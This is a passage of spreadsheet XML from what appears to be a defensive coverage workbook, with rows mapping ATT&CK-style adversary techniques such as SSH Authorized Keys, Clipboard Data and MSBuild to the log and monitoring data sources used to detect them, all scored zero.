    <row r="93" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A93" s="43" t="s">
        <v>186</v>
      </c>
      <c r="B93" s="41" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:B)</f>
        <v>Communication Through Removable Media</v>
      </c>
      <c r="C93" s="45"/>
      <c r="D93" s="45"/>
      <c r="E93" s="45"/>
      <c r="F93" s="14">
        <v>0</v>
      </c>
      <c r="G93" s="14">
        <v>0</v>
      </c>
      <c r="H93" s="14">
        <v>0</v>
      </c>
      <c r="I93" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K93" s="46" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
    </row>
    <row r="94" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A94" s="43" t="s">
        <v>187</v>
      </c>
      <c r="B94" s="41" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:B)</f>
        <v>Communication Through Removable Media</v>
      </c>
      <c r="C94" s="45"/>
      <c r="D94" s="45"/>
      <c r="E94" s="45"/>
      <c r="F94" s="14">
        <v>0</v>
      </c>
      <c r="G94" s="14">
        <v>0</v>
      </c>
      <c r="H94" s="14">
        <v>0</v>
      </c>
      <c r="I94" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K94" s="46" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
    </row>
    <row r="95" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A95" s="43" t="s">
        <v>188</v>
      </c>
      <c r="B95" s="41" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:B)</f>
        <v>Communication Through Removable Media</v>
      </c>
      <c r="C95" s="45"/>
      <c r="D95" s="45"/>
      <c r="E95" s="45"/>
      <c r="F95" s="14">
        <v>0</v>
      </c>
      <c r="G95" s="14">
        <v>0</v>
      </c>
      <c r="H95" s="14">
        <v>0</v>
      </c>
      <c r="I95" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K95" s="46" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
    </row>
    <row r="96" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A96" s="43" t="s">
        <v>190</v>
      </c>
      <c r="B96" s="41" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:B)</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="C96" s="45"/>
      <c r="D96" s="45"/>
      <c r="E96" s="45"/>
      <c r="F96" s="14">
        <v>0</v>
      </c>
      <c r="G96" s="14">
        <v>0</v>
      </c>
      <c r="H96" s="14">
        <v>0</v>
      </c>
      <c r="I96" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K96" s="46" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
    </row>
    <row r="97" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A97" s="43" t="s">
        <v>192</v>
      </c>
      <c r="B97" s="41" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:B)</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="C97" s="45"/>
      <c r="D97" s="45"/>
      <c r="E97" s="45"/>
      <c r="F97" s="14">
        <v>0</v>
      </c>
      <c r="G97" s="14">
        <v>0</v>
      </c>
      <c r="H97" s="14">
        <v>0</v>
      </c>
      <c r="I97" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K97" s="46" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
    </row>
    <row r="98" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A98" s="43" t="s">
        <v>194</v>
      </c>
      <c r="B98" s="41" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:B)</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="C98" s="45"/>
      <c r="D98" s="45"/>
      <c r="E98" s="45"/>
      <c r="F98" s="14">
        <v>0</v>
      </c>
      <c r="G98" s="14">
        <v>0</v>
      </c>
      <c r="H98" s="14">
        <v>0</v>
      </c>
      <c r="I98" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K98" s="46" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
    </row>
    <row r="99" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A99" s="43" t="s">
        <v>195</v>
      </c>
      <c r="B99" s="41" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:B)</f>
        <v>Account Manipulation</v>
      </c>
      <c r="C99" s="45"/>
      <c r="D99" s="45"/>
      <c r="E99" s="45"/>
      <c r="F99" s="14">
        <v>0</v>
      </c>
      <c r="G99" s="14">
        <v>0</v>
      </c>
      <c r="H99" s="14">
        <v>0</v>
      </c>
      <c r="I99" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K99" s="46" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs</v>
      </c>
    </row>
    <row r="100" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A100" s="43" t="s">
        <v>196</v>
      </c>
      <c r="B100" s="41" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:B)</f>
        <v>SSH Authorized Keys</v>
      </c>
      <c r="C100" s="45"/>
      <c r="D100" s="45"/>
      <c r="E100" s="45"/>
      <c r="F100" s="14">
        <v>0</v>
      </c>
      <c r="G100" s="14">
        <v>0</v>
      </c>
      <c r="H100" s="14">
        <v>0</v>
      </c>
      <c r="I100" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K100" s="46" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="101" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A101" s="43" t="s">
        <v>198</v>
      </c>
      <c r="B101" s="41" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:B)</f>
        <v>SSH Authorized Keys</v>
      </c>
      <c r="C101" s="45"/>
      <c r="D101" s="45"/>
      <c r="E101" s="45"/>
      <c r="F101" s="14">
        <v>0</v>
      </c>
      <c r="G101" s="14">
        <v>0</v>
      </c>
      <c r="H101" s="14">
        <v>0</v>
      </c>
      <c r="I101" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K101" s="46" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="102" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A102" s="43" t="s">
        <v>199</v>
      </c>
      <c r="B102" s="41" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:B)</f>
        <v>SSH Authorized Keys</v>
      </c>
      <c r="C102" s="45"/>
      <c r="D102" s="45"/>
      <c r="E102" s="45"/>
      <c r="F102" s="14">
        <v>0</v>
      </c>
      <c r="G102" s="14">
        <v>0</v>
      </c>
      <c r="H102" s="14">
        <v>0</v>
      </c>
      <c r="I102" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K102" s="46" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="103" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A103" s="43" t="s">
        <v>200</v>
      </c>
      <c r="B103" s="41" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:B)</f>
        <v>Web Service</v>
      </c>
      <c r="C103" s="45"/>
      <c r="D103" s="45"/>
      <c r="E103" s="45"/>
      <c r="F103" s="14">
        <v>0</v>
      </c>
      <c r="G103" s="14">
        <v>0</v>
      </c>
      <c r="H103" s="14">
        <v>0</v>
      </c>
      <c r="I103" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K103" s="46" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
    </row>
    <row r="104" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A104" s="43" t="s">
        <v>202</v>
      </c>
      <c r="B104" s="41" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:B)</f>
        <v>One-Way Communication</v>
      </c>
      <c r="C104" s="45"/>
      <c r="D104" s="45"/>
      <c r="E104" s="45"/>
      <c r="F104" s="14">
        <v>0</v>
      </c>
      <c r="G104" s="14">
        <v>0</v>
      </c>
      <c r="H104" s="14">
        <v>0</v>
      </c>
      <c r="I104" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K104" s="46" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
    </row>
    <row r="105" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A105" s="43" t="s">
        <v>203</v>
      </c>
      <c r="B105" s="41" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:B)</f>
        <v>Multi-Stage Channels</v>
      </c>
      <c r="C105" s="45"/>
      <c r="D105" s="45"/>
      <c r="E105" s="45"/>
      <c r="F105" s="14">
        <v>0</v>
      </c>
      <c r="G105" s="14">
        <v>0</v>
      </c>
      <c r="H105" s="14">
        <v>0</v>
      </c>
      <c r="I105" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K105" s="46" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
    </row>
    <row r="106" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A106" s="43" t="s">
        <v>205</v>
      </c>
      <c r="B106" s="41" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:B)</f>
        <v>Ingress Tool Transfer</v>
      </c>
      <c r="C106" s="45"/>
      <c r="D106" s="45"/>
      <c r="E106" s="45"/>
      <c r="F106" s="14">
        <v>0</v>
      </c>
      <c r="G106" s="14">
        <v>0</v>
      </c>
      <c r="H106" s="14">
        <v>0</v>
      </c>
      <c r="I106" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K106" s="46" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</v>
      </c>
    </row>
    <row r="107" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A107" s="43" t="s">
        <v>207</v>
      </c>
      <c r="B107" s="41" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:B)</f>
        <v>Native API</v>
      </c>
      <c r="C107" s="45"/>
      <c r="D107" s="45"/>
      <c r="E107" s="45"/>
      <c r="F107" s="14">
        <v>0</v>
      </c>
      <c r="G107" s="14">
        <v>0</v>
      </c>
      <c r="H107" s="14">
        <v>0</v>
      </c>
      <c r="I107" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K107" s="46" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:C)</f>
        <v>System calls,Loaded DLLs,API monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="108" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A108" s="43" t="s">
        <v>208</v>
      </c>
      <c r="B108" s="41" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:B)</f>
        <v>Native API</v>
      </c>
      <c r="C108" s="45"/>
      <c r="D108" s="45"/>
      <c r="E108" s="45"/>
      <c r="F108" s="14">
        <v>0</v>
      </c>
      <c r="G108" s="14">
        <v>0</v>
      </c>
      <c r="H108" s="14">
        <v>0</v>
      </c>
      <c r="I108" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K108" s="46" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:C)</f>
        <v>System calls,Loaded DLLs,API monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="109" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A109" s="43" t="s">
        <v>210</v>
      </c>
      <c r="B109" s="41" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:B)</f>
        <v>Redundant Access</v>
      </c>
      <c r="C109" s="45"/>
      <c r="D109" s="45"/>
      <c r="E109" s="45"/>
      <c r="F109" s="14">
        <v>0</v>
      </c>
      <c r="G109" s="14">
        <v>0</v>
      </c>
      <c r="H109" s="14">
        <v>0</v>
      </c>
      <c r="I109" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K109" s="46" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</v>
      </c>
    </row>
    <row r="110" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A110" s="43" t="s">
        <v>212</v>
      </c>
      <c r="B110" s="41" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:B)</f>
        <v>Redundant Access</v>
      </c>
      <c r="C110" s="45"/>
      <c r="D110" s="45"/>
      <c r="E110" s="45"/>
      <c r="F110" s="14">
        <v>0</v>
      </c>
      <c r="G110" s="14">
        <v>0</v>
      </c>
      <c r="H110" s="14">
        <v>0</v>
      </c>
      <c r="I110" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K110" s="46" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</v>
      </c>
    </row>
    <row r="111" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A111" s="43" t="s">
        <v>214</v>
      </c>
      <c r="B111" s="41" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:B)</f>
        <v>Brute Force</v>
      </c>
      <c r="C111" s="45"/>
      <c r="D111" s="45"/>
      <c r="E111" s="45"/>
      <c r="F111" s="14">
        <v>0</v>
      </c>
      <c r="G111" s="14">
        <v>0</v>
      </c>
      <c r="H111" s="14">
        <v>0</v>
      </c>
      <c r="I111" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K111" s="46" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Authentication logs</v>
      </c>
    </row>
    <row r="112" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A112" s="43" t="s">
        <v>215</v>
      </c>
      <c r="B112" s="41" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:B)</f>
        <v>Two-Factor Authentication Interception</v>
      </c>
      <c r="C112" s="45"/>
      <c r="D112" s="45"/>
      <c r="E112" s="45"/>
      <c r="F112" s="14">
        <v>0</v>
      </c>
      <c r="G112" s="14">
        <v>0</v>
      </c>
      <c r="H112" s="14">
        <v>0</v>
      </c>
      <c r="I112" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K112" s="46" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Kernel drivers</v>
      </c>
    </row>
    <row r="113" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A113" s="43" t="s">
        <v>216</v>
      </c>
      <c r="B113" s="41" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:B)</f>
        <v>Modify Registry</v>
      </c>
      <c r="C113" s="45"/>
      <c r="D113" s="45"/>
      <c r="E113" s="45"/>
      <c r="F113" s="14">
        <v>0</v>
      </c>
      <c r="G113" s="14">
        <v>0</v>
      </c>
      <c r="H113" s="14">
        <v>0</v>
      </c>
      <c r="I113" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K113" s="46" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
    </row>
    <row r="114" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A114" s="43" t="s">
        <v>218</v>
      </c>
      <c r="B114" s="41" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:B)</f>
        <v>Screen Capture</v>
      </c>
      <c r="C114" s="45"/>
      <c r="D114" s="45"/>
      <c r="E114" s="45"/>
      <c r="F114" s="14">
        <v>0</v>
      </c>
      <c r="G114" s="14">
        <v>0</v>
      </c>
      <c r="H114" s="14">
        <v>0</v>
      </c>
      <c r="I114" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K114" s="46" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="115" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A115" s="43" t="s">
        <v>220</v>
      </c>
      <c r="B115" s="41" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:B)</f>
        <v>Email Collection</v>
      </c>
      <c r="C115" s="45"/>
      <c r="D115" s="45"/>
      <c r="E115" s="45"/>
      <c r="F115" s="14">
        <v>0</v>
      </c>
      <c r="G115" s="14">
        <v>0</v>
      </c>
      <c r="H115" s="14">
        <v>0</v>
      </c>
      <c r="I115" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K115" s="46" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:C)</f>
        <v>Office 365 trace logs,Mail server,Email gateway,Authentication logs,File monitoring,Process monitoring,Process use of network</v>
      </c>
    </row>
    <row r="116" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A116" s="43" t="s">
        <v>222</v>
      </c>
      <c r="B116" s="41" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C116" s="45"/>
      <c r="D116" s="45"/>
      <c r="E116" s="45"/>
      <c r="F116" s="14">
        <v>0</v>
      </c>
      <c r="G116" s="14">
        <v>0</v>
      </c>
      <c r="H116" s="14">
        <v>0</v>
      </c>
      <c r="I116" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K116" s="46" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
    </row>
    <row r="117" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A117" s="43" t="s">
        <v>223</v>
      </c>
      <c r="B117" s="41" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C117" s="45"/>
      <c r="D117" s="45"/>
      <c r="E117" s="45"/>
      <c r="F117" s="14">
        <v>0</v>
      </c>
      <c r="G117" s="14">
        <v>0</v>
      </c>
      <c r="H117" s="14">
        <v>0</v>
      </c>
      <c r="I117" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K117" s="46" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
    </row>
    <row r="118" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A118" s="43" t="s">
        <v>224</v>
      </c>
      <c r="B118" s="41" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C118" s="45"/>
      <c r="D118" s="45"/>
      <c r="E118" s="45"/>
      <c r="F118" s="14">
        <v>0</v>
      </c>
      <c r="G118" s="14">
        <v>0</v>
      </c>
      <c r="H118" s="14">
        <v>0</v>
      </c>
      <c r="I118" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K118" s="46" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
    </row>
    <row r="119" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A119" s="43" t="s">
        <v>225</v>
      </c>
      <c r="B119" s="41" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C119" s="45"/>
      <c r="D119" s="45"/>
      <c r="E119" s="45"/>
      <c r="F119" s="14">
        <v>0</v>
      </c>
      <c r="G119" s="14">
        <v>0</v>
      </c>
      <c r="H119" s="14">
        <v>0</v>
      </c>
      <c r="I119" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K119" s="46" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
    </row>
    <row r="120" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A120" s="43" t="s">
        <v>226</v>
      </c>
      <c r="B120" s="41" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:B)</f>
        <v>Automated Collection</v>
      </c>
      <c r="C120" s="45"/>
      <c r="D120" s="45"/>
      <c r="E120" s="45"/>
      <c r="F120" s="14">
        <v>0</v>
      </c>
      <c r="G120" s="14">
        <v>0</v>
      </c>
      <c r="H120" s="14">
        <v>0</v>
      </c>
      <c r="I120" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K120" s="46" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention,Process command-line parameters</v>
      </c>
    </row>
    <row r="121" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A121" s="43" t="s">
        <v>227</v>
      </c>
      <c r="B121" s="41" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:B)</f>
        <v>Peripheral Device Discovery</v>
      </c>
      <c r="C121" s="45"/>
      <c r="D121" s="45"/>
      <c r="E121" s="45"/>
      <c r="F121" s="14">
        <v>0</v>
      </c>
      <c r="G121" s="14">
        <v>0</v>
      </c>
      <c r="H121" s="14">
        <v>0</v>
      </c>
      <c r="I121" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K121" s="46" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="122" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A122" s="43" t="s">
        <v>228</v>
      </c>
      <c r="B122" s="41" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:B)</f>
        <v>Peripheral Device Discovery</v>
      </c>
      <c r="C122" s="45"/>
      <c r="D122" s="45"/>
      <c r="E122" s="45"/>
      <c r="F122" s="14">
        <v>0</v>
      </c>
      <c r="G122" s="14">
        <v>0</v>
      </c>
      <c r="H122" s="14">
        <v>0</v>
      </c>
      <c r="I122" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K122" s="46" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="123" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A123" s="43" t="s">
        <v>229</v>
      </c>
      <c r="B123" s="41" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:B)</f>
        <v>Peripheral Device Discovery</v>
      </c>
      <c r="C123" s="45"/>
      <c r="D123" s="45"/>
      <c r="E123" s="45"/>
      <c r="F123" s="14">
        <v>0</v>
      </c>
      <c r="G123" s="14">
        <v>0</v>
      </c>
      <c r="H123" s="14">
        <v>0</v>
      </c>
      <c r="I123" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K123" s="46" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="124" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A124" s="43" t="s">
        <v>231</v>
      </c>
      <c r="B124" s="41" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:B)</f>
        <v>Audio Capture</v>
      </c>
      <c r="C124" s="45"/>
      <c r="D124" s="45"/>
      <c r="E124" s="45"/>
      <c r="F124" s="14">
        <v>0</v>
      </c>
      <c r="G124" s="14">
        <v>0</v>
      </c>
      <c r="H124" s="14">
        <v>0</v>
      </c>
      <c r="I124" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K124" s="46" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="125" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A125" s="43" t="s">
        <v>232</v>
      </c>
      <c r="B125" s="41" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:B)</f>
        <v>System Time Discovery</v>
      </c>
      <c r="C125" s="45"/>
      <c r="D125" s="45"/>
      <c r="E125" s="45"/>
      <c r="F125" s="14">
        <v>0</v>
      </c>
      <c r="G125" s="14">
        <v>0</v>
      </c>
      <c r="H125" s="14">
        <v>0</v>
      </c>
      <c r="I125" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K125" s="46" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,API monitoring</v>
      </c>
    </row>
    <row r="126" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A126" s="43" t="s">
        <v>233</v>
      </c>
      <c r="B126" s="41" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:B)</f>
        <v>Video Capture</v>
      </c>
      <c r="C126" s="45"/>
      <c r="D126" s="45"/>
      <c r="E126" s="45"/>
      <c r="F126" s="14">
        <v>0</v>
      </c>
      <c r="G126" s="14">
        <v>0</v>
      </c>
      <c r="H126" s="14">
        <v>0</v>
      </c>
      <c r="I126" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K126" s="46" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,API monitoring</v>
      </c>
    </row>
    <row r="127" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A127" s="43" t="s">
        <v>234</v>
      </c>
      <c r="B127" s="41" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:B)</f>
        <v>Video Capture</v>
      </c>
      <c r="C127" s="45"/>
      <c r="D127" s="45"/>
      <c r="E127" s="45"/>
      <c r="F127" s="14">
        <v>0</v>
      </c>
      <c r="G127" s="14">
        <v>0</v>
      </c>
      <c r="H127" s="14">
        <v>0</v>
      </c>
      <c r="I127" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K127" s="46" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,API monitoring</v>
      </c>
    </row>
    <row r="128" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A128" s="43" t="s">
        <v>236</v>
      </c>
      <c r="B128" s="41" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:B)</f>
        <v>Trusted Developer Utilities Proxy Execution</v>
      </c>
      <c r="C128" s="45"/>
      <c r="D128" s="45"/>
      <c r="E128" s="45"/>
      <c r="F128" s="14">
        <v>0</v>
      </c>
      <c r="G128" s="14">
        <v>0</v>
      </c>
      <c r="H128" s="14">
        <v>0</v>
      </c>
      <c r="I128" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K128" s="46" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="129" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A129" s="43" t="s">
        <v>237</v>
      </c>
      <c r="B129" s="41" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:B)</f>
        <v>MSBuild</v>
      </c>
      <c r="C129" s="45"/>
      <c r="D129" s="45"/>
      <c r="E129" s="45"/>
      <c r="F129" s="14">
        <v>0</v>
      </c>
      <c r="G129" s="14">
        <v>0</v>
      </c>
      <c r="H129" s="14">
        <v>0</v>
      </c>
      <c r="I129" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K129" s="46" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
    </row>
    <row r="130" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A130" s="43" t="s">
        <v>238</v>
      </c>
      <c r="B130" s="41" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:B)</f>
        <v>Shared Modules</v>
      </c>
      <c r="C130" s="45"/>
      <c r="D130" s="45"/>
      <c r="E130" s="45"/>
      <c r="F130" s="14">
        <v>0</v>
      </c>
      <c r="G130" s="14">
        <v>0</v>
      </c>
      <c r="H130" s="14">
        <v>0</v>
      </c>
      <c r="I130" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K130" s="46" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="131" spans="1:11" x14ac:dyDescent="0.2">
